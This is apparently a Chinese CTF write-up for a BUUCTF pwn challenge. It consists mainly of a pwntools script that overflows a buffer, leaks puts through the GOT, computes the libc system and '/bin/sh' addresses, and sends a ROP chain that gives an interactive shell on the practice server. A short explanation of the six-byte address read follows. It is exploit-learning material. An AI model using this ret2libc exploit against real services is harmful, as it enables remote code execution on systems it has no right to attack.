这篇博客展示了如何使用Python的`os`和`pwn`库来实现远程服务器的内存操作,包括发送payload修改内存地址,获取`puts`函数地址,计算`system`和`bin/sh`地址,并执行系统命令。关键步骤包括构造payload,发送数据,以及交互接收返回信息。
from os import system
from pwn import*
context.log_level='debug'
p=remote('node4.buuoj.cn',25535)
libc_ = ELF('./libc-2.23.so')
elf = ELF('./2020')
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
#p.recvuntil("Pull up your sword and tell me u story!")
#p.recv(3)
paylaod = 'a'*0x28 + p64(0x400733 )+p64(puts_got) + p64(puts_plt) + p64(0x4006ad)
p.sendline(paylaod)
p.recv()#this is important because of it ,the flag can be get
addr_=u64(p.recv(6).ljust(8,'\x00'))
#addr_=u64(p.recvuntil('\n')[:-1].ljust(8,'\x00'))
print(hex(addr_))
base_=addr_-libc_.symbols['puts']
system_=base_ + libc_.symbols['system']
bin_=base_+libc_.search('/bin/sh').next()
pay = 'a'*0x28 + p64(0x400733) +p64(bin_) + p64(system_)
#p.recv(3)
#p.recvuntil("Pull up your sword and tell me u story!")
p.sendline(pay)
p.interactive()
这里addr_=u64(p.recv(6).ljust(8,'\x00'))这一句这个之所以这样写:我们首先来看接收到的write的地址,利用print(hex(addr_))的两种结果:
1:
2:利用print((addr_))的结果:
通过以上两种输出我们可以看到,这个选着接收6个字符是由地址的16进制形式,这里是:0x7f4cb1e36690数一下可以发现是6个字节
。
另外本题还需要注意的是利用context.log_level='debug'时,再gdb里观察可以发现和远程程序交流的收、发数据情况,由此正确使用p.recv语句。关于题目的思路其余师傅的wp讲的很清楚,正常解法。
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
